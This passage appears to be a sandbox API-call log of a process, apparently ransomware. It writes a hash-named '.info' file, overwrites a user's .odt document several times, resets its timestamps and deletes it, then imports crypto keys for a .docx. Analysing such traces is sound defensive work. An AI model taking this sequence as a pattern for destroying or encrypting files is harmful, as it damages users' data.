lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1.info", lpFilePart=0x0) returned 0x56 [0076.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\f0bc06e28c52de780677ce82eba6dbf1.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.380] GetFileType (hFile=0x36c) returned 0x1 [0076.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.380] GetFileType (hFile=0x36c) returned 0x1 [0076.380] WriteFile (in: hFile=0x36c, lpBuffer=0x21494b8*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x21494b8*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.381] CloseHandle (hObject=0x36c) returned 1 [0076.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17f320, ftCreationTime.dwHighDateTime=0x1d4d03a, ftLastAccessTime.dwLowDateTime=0x9f63fb30, ftLastAccessTime.dwHighDateTime=0x1d4c8e6, ftLastWriteTime.dwLowDateTime=0x9f63fb30, ftLastWriteTime.dwHighDateTime=0x1d4c8e6, nFileSizeHigh=0x0, nFileSizeLow=0xab5f)) returned 1 [0076.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.382] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", dwFileAttributes=0x80) returned 1 [0076.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), fInfoLevelId=0x0, lpFileInformation=0x21510c0 | out: lpFileInformation=0x21510c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4e17f320, ftCreationTime.dwHighDateTime=0x1d4d03a, ftLastAccessTime.dwLowDateTime=0x9f63fb30, ftLastAccessTime.dwHighDateTime=0x1d4c8e6, ftLastWriteTime.dwLowDateTime=0x9f63fb30, ftLastWriteTime.dwHighDateTime=0x1d4c8e6, nFileSizeHigh=0x0, nFileSizeLow=0xab5f)) returned 1 [0076.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.382] GetFileType (hFile=0x36c) returned 0x1 [0076.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.383] GetFileType (hFile=0x36c) returned 0x1 [0076.383] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.383] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.384] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.385] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.386] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.386] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.387] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.388] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.388] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.389] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.390] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.390] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.391] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.391] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.392] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.404] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.404] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.405] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.406] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.407] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.407] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.408] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.409] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.409] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.410] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.410] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.411] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.412] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.412] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.413] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.414] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.415] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.415] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.416] WriteFile (in: hFile=0x36c, lpBuffer=0x2151568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x2151568*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.417] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.418] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.418] SetEndOfFile (hFile=0x36c) returned 1 [0076.419] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.419] CloseHandle (hObject=0x36c) returned 1 [0076.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.419] GetFileType (hFile=0x36c) returned 0x1 [0076.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.419] GetFileType (hFile=0x36c) returned 0x1 [0076.419] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.419] CloseHandle (hObject=0x36c) returned 1 [0076.419] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.419] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.419] GetFileType (hFile=0x36c) returned 0x1 [0076.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.420] GetFileType (hFile=0x36c) returned 0x1 [0076.420] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.420] CloseHandle (hObject=0x36c) returned 1 [0076.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.420] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.420] GetFileType (hFile=0x36c) returned 0x1 [0076.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.420] GetFileType (hFile=0x36c) returned 0x1 [0076.420] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.420] CloseHandle (hObject=0x36c) returned 1 [0076.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.420] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt")) returned 1 [0076.421] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.421] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", lpFilePart=0x0) returned 0x51 [0076.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\f0bc06e28c52de780677ce82eba6dbf1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.421] GetFileType (hFile=0x36c) returned 0x1 [0076.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.422] GetFileType (hFile=0x36c) returned 0x1 [0076.422] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.422] CloseHandle (hObject=0x36c) returned 1 [0076.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", lpFilePart=0x0) returned 0x51 [0076.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\f0bc06e28c52de780677ce82eba6dbf1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.422] GetFileType (hFile=0x36c) returned 0x1 [0076.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.422] GetFileType (hFile=0x36c) returned 0x1 [0076.422] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.422] CloseHandle (hObject=0x36c) returned 1 [0076.422] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", lpFilePart=0x0) returned 0x51 [0076.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.422] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\f0bc06e28c52de780677ce82eba6dbf1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.422] GetFileType (hFile=0x36c) returned 0x1 [0076.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.423] GetFileType (hFile=0x36c) returned 0x1 [0076.423] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.423] CloseHandle (hObject=0x36c) returned 1 [0076.423] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.423] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", lpFilePart=0x0) returned 0x3c [0076.424] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x2154c30, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626ec0) returned 1 [0076.424] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.424] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.424] CryptExportKey (in: hKey=0x1a626ec0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2154d20, pdwDataLen=0x1bf5d230 | out: pbData=0x2154d20*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.424] CryptImportKey (in: hProv=0x1a5b6e10, pbData=0x2154e40, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626ad0) returned 1 [0076.424] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.424] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.424] CryptDuplicateKey (in: hKey=0x1a626ad0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626c20) returned 1 [0076.424] CryptContextAddRef (hProv=0x1a5b6e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.424] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x4, pbData=0x2154f88*=0x1, dwFlags=0x0) returned 1 [0076.424] CryptSetKeyParam (hKey=0x1a626c20, dwParam=0x1, pbData=0x2154f38, dwFlags=0x0) returned 1 [0076.424] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.424] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\qUHAji.docx", nBufferLength=0x105, lpBuffer=0x1bf5cb50, 